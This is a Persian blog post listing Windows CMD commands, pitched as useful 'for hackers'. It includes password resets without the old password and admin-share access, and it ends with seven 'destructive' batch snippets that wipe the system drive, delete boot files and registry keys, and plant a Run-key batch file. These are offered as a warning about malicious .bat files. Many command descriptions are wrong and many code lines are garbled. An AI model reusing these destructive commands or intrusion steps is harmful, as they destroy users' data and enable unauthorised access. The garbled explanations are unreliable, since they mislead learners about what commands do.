دستورات cmd ،مهمترین و کاربردی ترین دستورات cmd

0

دستورات cmd برای هک ، دستورات cmd در ویندوز ، دستورات خطرناک cmd ، دستورات شبکه در cmd ،دستورات dos ، دستورات جالب cmd ،ترفند های cmd ، دستور ساخت فایل در cmd

خط فرمان در سیستم عامل‌های مانند ویندوز ، لینوکس و… بصورت یک نرم افزار ارائه می‌شود که Command Prompt نام دارد.

برای وارد شدن به CMD در ویندوز از منو استارت وارد RuN شوید و عبارت Cmd را تایپ کنید و اینتر بزنید ..

مفیدترین دستورات CMD برای هکرها

برای دسترسی به CMD کافی است کلیدهای ترکیبی Win+R را فشار دهید تا Run باز شود. سپس عبارت cmd را وارد کرده و Enter بزنید.

۱. ping

این دستور به شما اجازه می‌دهد که پی ببرید میزبان مورد نظر شما در حال حاضر دردسترس است یا خیر. بدین معنا که به هنگام اجرای دستور ping، میزبان در صورت متصل بودن چه پاسخی را برای شما ارسال می‌کند.
برای استفاده از این دستور کافی است عبارت ping را به همراه IP یا دامنه‌ی سایت یا کلاینت مورد نظر وارد نمایید. به عنوان مثال:

ping 8.8.8.8
ping www.google.com

پاسخ دریافتی از میزبان بیان‌گر وضعیت آن است. هر چه زمان درج شده در مقابل time، کم‌تر باشد و پاسخ دریافتی عاری از خطا باشد، به این معناست که سرعت اتصال به آن بیشتر و وضعیت آن نیز پایدارتر است.

۲. nslookup

این دستور کاربردهای گوناگونی دارد. یکی از آن‌ها یافتن IP از روی DNS است. فرض کنید آدرس یک سایت را می‌دانید اما از IP آن بی‌خبر هستید. با استفاده از این دستور می‌توانید به IP هر سایتی پی ببرید. به عنوان مثال:

nslookup www.google.com

یکی دیگر از کاربردهای nslookup در یافتن IP یک میل سرور خاص است. به عنوان مثال برای یافتن IP میل سرورهای یاهو این دستورات بایستی به ترتیب وارد شوند:

nslookup
set type=mx
yahoo.com

۳. tracert

با استفاده از این دستور می‌توانید از مسیری که یک بسته در شبکه طی می‌کند تا به مقصد برسد اطلاعات خوبی کسب کنید. این دستور برای مسیریابی بسته‌ی ارسالی تا مقصد بسیار مفید است.

برای یافتن محل افراد از طریق ای پی ( در مراحل پیشرفته )

مثال:

tracert 8.8.8.8
tracert www.google.com

۴. arp

این دستور جدول arp را برای شما نمایش می‌دهد. در این جدول، IPها و آدرس معادل MAC آن‌ها نگهداری می‌شوند. اگر فعالیت غیرقانونی در شبکه‌ی شما رخ داده است و به عنوان مثال کارت شبکه‌ای بدون اجازه‌ی شما تعویض شده است، از طریق این جدول می‌توانید به سادگی به این موضوع پی ببرید:

arp -a

۵. route

این دستور اطلاعات کامل مربوط به لیست کارت‌های شبکه، جدول مسیریابی و درگاه‌های هر یک را برای شما بازگو می‌کند:

route print

۶. ipconfig

این دستور اطلاعات مفیدی در خصوص IP و Gateway شما، DNS در حال استفاده و نظایر آن را برای شما نمایش می‌دهد:

 ipconfig

یا

 ipconfig /all

همچنین اگر از IP دینامیک استفاده می‌کنید و مایلید IP خود را تغییر دهید با این دستورات می‌توانید این کار را انجام دهید:

ipconfig /release
ipconfig /renew

۷. netstat

این دستور وضعیت اتصالات شما را نمایش می‌دهد:

netstat

نمایش تمامی پورت‌هایی که در وضعیت شنود قرار دارند و اتصال با نام DNS:

netstat -a

 

نمایش تمامی اتصالات باز و IP آن‌ها:

netstat -n

 

ترکیب دو حالت بالا:

netstat -an

 

دستور زیر نیز تمامی پوشه‌های به اشتراک‌گذاشته‌شده در رایانه‌ی مقصد را نمایش می‌دهد:

net view x.x.x.x

یا

net view computername

به جای x.x.x.x و computername بایستی آدرس IP یا نام رایانه را وارد نمایید.

۸. netuser

این دستور رمز عبور حساب کاربری ویندوز را بدون دانستن رمز قبلی تغییر می‌دهد:

net user Tarfandestan *

به جای Tarfandestan نام کاربری ویندوز را بنویسید و پس از فشردن Enter، رمز جدید را وارد کنید.

می توان کاربری را اضافه یا کم کرد.

 Net user peachlearn /add Net user peachlearn /del

و برای دادن پسورد به کاربر

Net user peachlearn password /add

نکته : برای حذف کاربر دیگر پسوند نمی خواهد

سایر دستورات

دستورات دیگری نیز هستند که می‌توانند به شما کمک کنند.

اتصال به دستگاه مقصد با دسترسی Administrator:

 net use \ipaddressipc$ “” /user:administrator

به جای ipaddress، آدرس IP را وارد نمایید.

پس از اتصال به مقصد اگر مایل به مرور کل درایو C بودید از این دستور استفاده کنید:

 net use K: \computernameC$

به جای computername نام رایانه را وارد کنید. این دستور موجب ایجاد یک درایو مجازی می‌شود. دقت کنید این دستور زمانی کار می‌کند که رایانه‌ی مقصد رمز عبور Adminastrator تعیین نکرده باشد.

 

 

۱. دستور ASSOC
برای تغییر و نشان دادن اینکه چه فایلی با چه برنامه ای باز شود. (در ویندوز ۷ ممکن است به درستی جواب ندهد)

ASSOC.txt=textfile

 

۲. دستور ATTRIB

برای نشان دادن وضعیت فایل ها از جمله مخفی بودن و یا سیستمی و فقط خواندنی و…
برای از حالت در آوردن ، در کنار پارامتر حرف – را وارد کنید و برای به حالت در آوردن ، از حرف + استفاده کنید.

[code]ATTRIB –R –H –S C:\boot.ini[/code]

 

۳. دستور BREAK
برای شکست خط است.


BREAK

۴. دستور BCDEDIT
برای ویرایش فایل بوت و نشان دادن مکان فایلی که رایانه را روشن می کند.

BCDEDIT

۵. دستور CACLS
برای نشان دادن اینکه دسترسی امکان پذیر است یا نه.

CACLS D:

 

۶. دستور CALL
برای اجرا کردن یک بچ فایل استفاده می شود.

CALLS d:\a.bat

 

۷. دستور CD
مسیر کلی را نشان می دهد و می توان آن را تغییر داد.

CD /D D:peachlearn32

 

۸. دستور DHCP
برای نشان دادن وضعیت صفحه ها به کار می رود.

DHCP

 

۹. دستور CHDIR
در واقع همان دستور CD است.

CD /D D:\peachlearnBREAK

 

۱۰. دستور CHKDSK
وضعیت درایور را نشان می دهد از جمله فضای مصرف شده و مانده.

CHKDSK D:

 

۱۱. دستور CHKNTFS
برای نشان دادن اینکه درایوری دارای فرمت NTFS را دارد یا نه.

CHKNTFS D:

 

۱۲. دستور CLS
برای پاک کردن صفحه کامنت استفاده می شود.

CLS

 

۱۳. دستور CMD
یک کامنت جدید را باز می کند.

CMD

۱۴. دستور COLOR

متوانید رنگ کامنت را عوض کنید.

COLOR 2

 

۱۵. دستور COMP
برای ترکیب کردن دو فایل در یک فایل

COMP D:\1.TXT D:\3.TXTCLS

 

۱۶. دستور Compact
برای فشرده کردن یک فایل یا پوشه به کار می رود

COMPACT /C D:\peachlearnCMD

۱۷. دستور Convert
برای عوض کردن فرمت FAT به فرمت NTFS استفاده می شود.

CONVERT C: /FS:NTFSCMD


۱۸. دستور Copy

برای کپی کردن فایل ها استفاده می شود.

COPY d:\3.txt d:\20CMD

۱۹. دستور Del

برای حذف فایل یا فایل ها به کار می رود.

DEL /Q /S D:\2.TXT

۲۰. دستور Dir

برای نشان دادن اینکه چه فایل هایی در درایو است.

DIR C

 

۲۱. دستور Diskcompt

برای فشرده کردن فایل ها و ذخیره بر روی فلاپی استفاده می شود.

DISKCOMP

 

۲۲. دستور Diskcopy
در واقع همان دستور بالا است. اما فایل ها را کپی می کند.

DISKCOPY

 

۲۳. دستور Diskpart
برای نشان دادن پارتیشن درایو ها استفاده می شود.

Diskpart D:

 

۲۴. دستور Doskey
برای ایجاد ماکرو ها و ویرایش خط های کامنت استفاده می شود.

DOSKEY

 

۲۵. دستور DriverQuery
برای نشان دادن تمام قطعات نصب شده بر روی سیستم استفاده می شود.

DISKQUERY

۲۷. دستور Erase
همان دستور حذف است.

Erase

 

۲۸. دستور Exit
برای خروج از کامنت استفاده می شود.

Exit

 

۲۹. دستور FC
محتویات ۲ فایل متنی را نشان می دهد.

Fc d:\1.txt d:\2.txtCLS

 

۳۰. دستور Find
جستجو را درون فایل های بررسی می کند.

Find "1.txt"

۳۱. دستور Findstr
جستجو را درون فایل ها بررسی می کند.

FINDSTR d:\1.txt

 

۳۲. دستور For
برای باز کردن فایل هایی از یک منبع اصلی.

For d:\data1.cab saxas.bat

 

۳۳. دستور Format
برای فرمت کردن درایور ها استفاده می شود.

Format D:

 

۳۴. دستور Fsutil
برای به دست آوردن اطلاعاتی از فایل های سیستمی استفاده می شود.

FSUTIL fsinfo c:\autoexec.bat

 

۳۵. دستور Ftype
تقریبا همان دستور Assoc است.

Ftype

 

۳۶. دستور Gpresult
تقریبا همان gpedit.msc است.

Gpresult /r

 

۳۷. دستور Graftabl
برای بدست آوردن شماره برنامه باز شده استفاده می شود.

Graftabl

۳۸. دستور Help
راهنمای دستور های کامنت.

Help

 

۳۹. دستور Icacls
برای گرفتن بک آپ و… از فایل ها استفاده می شود.

ICACLS [drivename:] path

 

۴۰. دستور If
برای پردازش در فایل های بچ استفاده می شود.

If/?

 

۴۱. دستور Label
برای تغییر نام درایور ها استفاده می شود.

Label D: Software

 

۴۲. دستور MD
برای ایجاد پوشه استفاده می شود.

MD D:\sxs

 

۴۳. دستور Mkdir
برای ایجاد پوشه های تو در تو استفاده می شود.

Mkdir d:\sxs\sxs\sxs\sxs\32

 

۴۴. دستور Mklink
پوشه ای بسازید که به راحتی باز نشود.

MKLINK /d /h /j d:\1.txt 0

 

۴۵. دستور Mode
قطعات سخت افزاری نصب شده را نشان می دهد.

Mode

 

۴۶. دستور More
برای نشان دادن فایل های متنی و چمد کاربرد دیگر استفاده می شود.

More D:\1.txt

 

 

۴۷. دستور Move
برای انتقال فایل استفاده می شود.

Move D:\1.txt G:

 

۴۸. دستور Openfiles
اگر با رایانه ای دیگر ارتباط داشته باشید ، فایل های آن را نشان می دهد.

Openfiles

 

 

۴۹. دستور Path
مسیر جاری را نشان می دهد.

Path

 

 

۵۰. دستور Pause
باعث توقف موقت می شود.

Pause

 

 

۵۱. دستور Print
برای چاپ یک فایل متنی مورد استفاده قرار می گیرد.

Print D:\1.txt

 

۵۲. دستور Prompt
برای ویرایش کامنت استفاده می شود.

Prompt $b $t

 

۵۳. دستور RD
برای حذف یک پوشه به کار می رود.

RD d:\sxs\sxs\sxs\32

 

۵۴. دستور Defective
برای بازگردانی یک فایل از دیسکت خارجی استفاده می شود.

Defective I:\peachlearn.html

 

 

۵۵. دستور REM
برای ضبط پیام هایی که از یک فایل خاص انتشار می شود استفاده می شود.

REM c:\autoexec.bat

 

۵۶. دستور REN
برای تغییر نام یک فایل و حتی پسوند استفاده می شود.

REN D:\1.txt 2.html

 

۵۷. دستور Rename
همان دستور بالا است.

Rename E:\1.txt 2.txt

 

۵۸. دستور Replace
برای جایگزین کردن فایل ها با هم استفاده می شود.

Replace

 

۵۹. دستور RMDIR
برای حذف پوشه های تو در تو به کار می رود.

RIMDIR

 

۶۰. دستور Robocopy
تقریبا همان فرمان کپی است. (البته کمی پیشرفته تر)

Robocopy

 

۶۱. دستور SC
برای کار با سرویس ها به کار می رود.

SC Strat Netlogon

 

۶۲. دستور Schtasks
همه برانامه هایی که در زمان مشخصی شروع می شوند را نشان می دهد و حتی برنامه ای را می توان در زمان مشخصی باز کند.

Schtasks

 

۶۳. دستور Shutdown
برای خاموش کردن رایانه استفاده می شود.

Shotdown -r -t 00

 

۶۴. دستور Sort
ترتیب فایل ها را مشخص می کند و البته کاربرد مهمی ندارد.

Sort

 

۶۵. دستور Start
یک برنامه را اجرا می کند.

Start D:\2.txt

 

 

۶۶. دستور Subst
برای ساختن یک درایور از یک پوشه

Subst X: D:\Software

 

 

۶۷. دستور Systeminfo
اطلاعات سیستم را نشان می دهد.

systeminfo

 

۶۸. دستور Tasklist
همه برنامه های فعال را نشان می دهد.

tasklist

 

۶۹. دستور Taskkill
یک برنامه را قطع می کند

TASKKILL /pid [shomare barname]TASKKILL /pid 2128tasklist

 

 

۷۰. دستور Time
زمان سیستم را نشان می دهد و می توان آن را تغییر داد.

TIME 10:10:10

۷۱. دستور Title
عنوان کامنت را عوض می کند.

title PeachLearn

 

۷۲. دستور Tree
وضعیت پوشه یا درایو ها را به صورت درختی نشان می دهد.

Tree D:

 

۷۳. دستور Type
متن درون یک فایل را باز می کند.

Type D:\2.txt

 

۷۴. دستور Ver
نسخه ویندوز را نشان می دهد.

ver

 

۷۵. دستور Vol
شماره دیسک یا درایو را نشان می دهد.

vol d:

 

۷۶. دستور Net User
کاربرانی که از رایانه استفاده می کنند را نشان می دهد.

net user

 

۷۷. دستور net start
یک سرویس را شروع می کند.

net start tlntsvr

 

۷۸. دستور net stop
یک سرویس را متوقف می کند.

net stop tlnstvr

 

۷۹. دستور IPConfig
آدرس آیپی شما را نشان می دهد.

ipconfig

۸۰. دستور Ping

آیپی هدف را نشان می دهد و همچنین از فعال بودن مقصد هم گزارش می دهد. به جای ایکس ها ادرس اینترنتی یا ای پی ادرس وارد کنید .

Ping xxxx

توضیج دستورات مهم :

۸۱. دستور ATTRIB

این دستور دارای پارامتر های زیر را است :

+ Sets an attribute.
- Clears an attribute.
R Read-only file attribute.
A Archive file attribute.
S System file attribute.
H Hidden file attribute.
I Not content indexed file attribute.
[drive:][path][filename] Specifies a file or files for attrib to process.
/S Processes matching files in the current folder and all subfolders.
/D Processes folders as well.
/L Work on the attributes of the Symbolic Link versus.
the target of the Symbolic Link.

سوییچ های مهم : + و – و R و A و S و H

۸۲. دستور Copy

همانطور که قبلا توضیح دادیم برای کپی کردن فایل ها به کار می رود.

Copy [drive1:path:filename] [drive2:path]Copy D:\2.txt g:

۸۳. دستور MD

یک یا چند پوشه درست می کند.

Md D:\3\3\3\3\3\3\3

۸۴. دستور RD

یک یا چند پوشه را حذف می کند.

Rd D:\3\3\3\3\3\3\3

۸۵. دستور RN

همانطور که در بالا گقته شد ، می توان فرمت فایل ها را هم عوض کرد.

Ren d:\*.txt d:\*.html

نکته : *.* به معنای هر فایل با هر فرمتی است.

۸۶. دستور Subst

همانطور که گفته شد برای ساخت یک درایو از یک پوشه

 SUBST Z: c:\windows SUBST X: C: SUBST V: C:\windows\system32

و برای حذف درایو

 SUBST /d z: SUBST /d x: SUBST /d v:

۸۸. دستور Echo

برای نشان دادن پیغام از آن استفاده می شود.

 @echo off Echo peachlearn


۸۹. دستور netstat -an

برای دیدن آی پی افرادی که در حال ردو بدل اطلاعتا با شما شما هستند

netstat -an

۹۰. دستور Set
مسیر برنامه و پوشه های مهم را نشان می دهد.

دستورات مخرب CMD ویندوز

CMD یا Command Prompt ابزاری در ویندوز برای کار با برنامه های کامندی خود ویندوز و یا سایر آنها است، امروز قصد دارم شما را با ۷ کد مخرب CMD ویندوز آشنا کنیم که البته امیدوارم صرفا جهت مباحث آموزشی مورد استفاده قرار بگیره

این هفت کد از مخرب ترین کدهای ویندوزی هستند که ممکن هست نفوذگر آن را به اسم یک فایل مفید در قالب Bat. در اختیار شما بگذارد…

نکته: همیشه قبل از اجرا فایل های Bat. حتما آن را با یک Editor باز کرده و کدهای آن را آنالیز کنید.

در زیر چند کد خطرناک معرفی میکنم که اگر فایلی با این مشخصاتی دیدید از اجرای آن خودداری کنید:

۱- فرمت و یا پاک کردن کل هارد و آسیب رسانی به آن:

off

del %systemdrive%\*.*/f/s/q

shutdown –r –f –t 00

۲- تبدیل تمامی پسوند ها اجرایی به پسوند Text:

*.DOC*.TXT REN*.JPEG*.TXT

REN *.LNK*.TXT

REN *.AVI*.TXT

REN *.MPEG*.TXT

REN *.COM*.TXT

REN *.BAT*.TXT

۳- حذف فایل مهم سیستمی”System32″ :

c:\WINDOWS\SYSTEM32\*.*/q

۴- این کد در صورتی که اجرا بشه سیستمی دیگه وجود نخواهد داشت:

off

attrib –r –s –h c:\autoexec.bat

del c:\autoexec.bat

attrib –r –s –h c:\boot.ini

del c:\boot.ini

attrib –r –s –h c:\ntldr

del c:\ntldr

attrib –r –s –h c:\windows\win.ini

del c:\windows\win.ini

۵- حذف تمامی ریجستری ها:

OFF

START reg delete HKCR/.EXE

START reg delete HKCR/.dll

START reg delete HKCR/*

۶- نابودی تمامی کانکشن ها اینترنتی:

@echo off >c:windowswimn32.bat

echo break off >>c:windowswimn32.bat

echo ipconfig /release_all>>c:windowswimn32.bat

echo end>>c:windowswimn32.bat

reg add hkey_local_machineoftwindowscurrentversionrun /v

WINDOWsAPI/t reg_sz /d c:windowswimn32.bat /f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v

CONTROLexit/t reg_sz /d c:windowswimn32.bat /f

PAUSE

۷- فرمت درایو ها:

D:\

rd/s/q C:\ 

rd/s/q E:\

تا حد امکان از این دستورات ها استفاده نکنید؛ مسئولیت هرگونه استفاده نادرست بر عهده خودتان است!

ساتین

ممکن است شما دوست داشته باشید
ارسال یک پاسخ